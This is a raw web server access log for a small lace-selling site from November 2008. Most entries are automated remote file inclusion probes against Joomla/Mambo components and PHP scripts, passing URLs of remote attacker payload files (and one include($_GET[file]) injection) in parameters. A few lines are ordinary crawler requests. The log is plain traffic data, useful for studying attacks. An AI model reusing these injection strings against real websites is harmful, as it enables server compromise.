70.38.12.204 - - [22/Nov/2008:04:33:06 -0800] "GET /logs/access_081021.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.handmadelaces.com"
63.247.138.209 - - [22/Nov/2008:04:33:07 -0800] "GET /logs/access_081016.log/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.handmadelaces.com"
63.247.138.209 - - [22/Nov/2008:04:33:08 -0800] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.handmadelaces.com"
63.247.138.209 - - [22/Nov/2008:04:33:08 -0800] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:33:33 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
65.55.232.29 - - [22/Nov/2008:04:33:47 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.handmadelaces.com"
65.55.232.29 - - [22/Nov/2008:04:33:48 -0800] "GET / HTTP/1.1" 200 779 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:38:40 -0800] "GET /logs/access_081023.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.handmadelaces.com"
218.234.23.56 - - [22/Nov/2008:04:38:45 -0800] "GET /logs/access_081016.log/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
218.234.23.56 - - [22/Nov/2008:04:38:45 -0800] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
218.234.23.56 - - [22/Nov/2008:04:38:45 -0800] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:39:20 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:39:24 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
89.218.85.18 - - [22/Nov/2008:04:39:28 -0800] "GET /logs//multithumb.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
89.218.85.18 - - [22/Nov/2008:04:39:29 -0800] "GET /multithumb.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
195.12.53.176 - - [22/Nov/2008:04:39:37 -0800] "GET /?sourcedir=http://www.geocities.com/arifferoza/new.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.handmadelaces.com"
195.12.53.176 - - [22/Nov/2008:04:39:52 -0800] "GET /?sourcedir=http://www.geocities.com/arifferoza/new.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:40:21 -0800] "GET /logs/access_081016.log//include/admin.lib.inc.php?site_path=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:40:21 -0800] "GET /include/admin.lib.inc.php?site_path=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:40:21 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:40:30 -0800] "GET /include/admin.lib.inc.php?site_path=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:40:30 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:40:30 -0800] "GET /logs/access_081016.log//include/admin.lib.inc.php?site_path=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:40:38 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:40:38 -0800] "GET /include/admin.lib.inc.php?site_path=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:40:40 -0800] "GET /logs/access_081016.log//include/admin.lib.inc.php?site_path=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:40:49 -0800] "GET /logs/access_081016.log//include/admin.lib.inc.php?site_path=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:40:49 -0800] "GET /include/admin.lib.inc.php?site_path=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
74.53.153.82 - - [22/Nov/2008:04:40:49 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://evy.siteburg.com/ed.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:42:18 -0800] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:04:42:29 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:04:42:29 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
65.55.105.10 - - [22/Nov/2008:04:42:50 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.handmadelaces.com"
65.55.105.10 - - [22/Nov/2008:04:42:51 -0800] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:04:43:43 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:04:43:44 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:04:43:44 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
89.218.85.18 - - [22/Nov/2008:04:43:49 -0800] "GET /multithumb.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:04:44:08 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:04:44:08 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:04:44:08 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:45:34 -0800] "GET /logs/access_081023.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:45:38 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:45:39 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:45:39 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
70.38.12.204 - - [22/Nov/2008:04:46:13 -0800] "GET /logs/access_081023.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.handmadelaces.com"
202.155.5.43 - - [22/Nov/2008:04:46:38 -0800] "GET /logs/access_081014.log//skin/zero_vote/ask_password.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
202.155.5.43 - - [22/Nov/2008:04:46:39 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
202.155.5.43 - - [22/Nov/2008:04:46:39 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
66.249.67.81 - - [22/Nov/2008:04:47:46 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.handmadelaces.com"
63.247.138.209 - - [22/Nov/2008:04:48:40 -0800] "GET /logs/access.log/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.handmadelaces.com"
202.155.5.43 - - [22/Nov/2008:04:48:52 -0800] "GET /logs/access_081023.log//skin/zero_vote/ask_password.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:04:49:33 -0800] "GET /logs/access_081014.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:04:50:41 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
195.12.53.176 - - [22/Nov/2008:04:51:43 -0800] "GET /logs/access_081017.log/?sourcedir=http://www.geocities.com/arifferoza/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
195.12.53.176 - - [22/Nov/2008:04:51:43 -0800] "GET /logs/?sourcedir=http://www.geocities.com/arifferoza/new.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.805" "www.handmadelaces.com"
195.12.53.176 - - [22/Nov/2008:04:51:48 -0800] "GET /logs/access_081017.log/?sourcedir=http://www.geocities.com/arifferoza/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
195.12.53.176 - - [22/Nov/2008:04:51:48 -0800] "GET /logs/?sourcedir=http://www.geocities.com/arifferoza/new.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.805" "www.handmadelaces.com"
195.12.53.176 - - [22/Nov/2008:04:51:49 -0800] "GET /logs/access_081019.log/?sourcedir=http://www.geocities.com/arifferoza/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
202.125.38.99 - - [22/Nov/2008:04:51:53 -0800] "GET /logs/access_081021.log/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rapidfiretheatre.com/textpattern/pulaid.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.handmadelaces.com"
202.125.38.99 - - [22/Nov/2008:04:51:53 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rapidfiretheatre.com/textpattern/pulaid.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.handmadelaces.com"
202.125.38.99 - - [22/Nov/2008:04:51:53 -0800] "GET /logs/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.rapidfiretheatre.com/textpattern/pulaid.txt??%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.handmadelaces.com"
195.12.53.176 - - [22/Nov/2008:04:51:54 -0800] "GET /logs/access_081019.log/?sourcedir=http://www.geocities.com/arifferoza/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:04:51:58 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:04:52:05 -0800] "GET /logs/access_081014.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://hmarksi.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
85.214.21.28 - - [22/Nov/2008:04:54:15 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
85.214.21.28 - - [22/Nov/2008:04:54:16 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
85.214.21.28 - - [22/Nov/2008:04:54:28 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
85.214.21.28 - - [22/Nov/2008:04:54:44 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
85.214.21.28 - - [22/Nov/2008:04:54:44 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
85.214.21.28 - - [22/Nov/2008:04:54:45 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:04:55:00 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:04:55:00 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:55:04 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
66.34.133.35 - - [22/Nov/2008:04:55:04 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:55:04 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
66.34.133.35 - - [22/Nov/2008:04:55:04 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
66.34.133.35 - - [22/Nov/2008:04:55:04 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
66.34.133.35 - - [22/Nov/2008:04:55:05 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
66.34.133.35 - - [22/Nov/2008:04:55:05 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:04:55:08 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:04:55:08 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:04:55:09 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:55:12 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:04:55:13 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:04:55:13 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:04:55:13 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
86.109.98.224 - - [22/Nov/2008:04:55:13 -0800] "GET /bbs//skin/zero_vote/error.php?dir=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
66.34.133.35 - - [22/Nov/2008:04:55:14 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
66.34.133.35 - - [22/Nov/2008:04:55:14 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:55:16 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:55:25 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:55:25 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.handmadelaces.com"
66.34.133.35 - - [22/Nov/2008:04:55:26 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
66.34.133.35 - - [22/Nov/2008:04:55:26 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
66.34.133.35 - - [22/Nov/2008:04:55:28 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:55:31 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:55:31 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:55:32 -0800] "GET /logs//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
203.10.110.244 - - [22/Nov/2008:04:55:37 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:55:40 -0800] "GET /logs/access_081017.log//component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
98.129.21.210 - - [22/Nov/2008:04:55:40 -0800] "GET /component/option,com_custompages/Itemid,57/tpl_color,green//index.php?option=com_custompages&cpage=http://seahawksal.com/chat//inc/cmses/gif/newid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.handmadelaces.com"
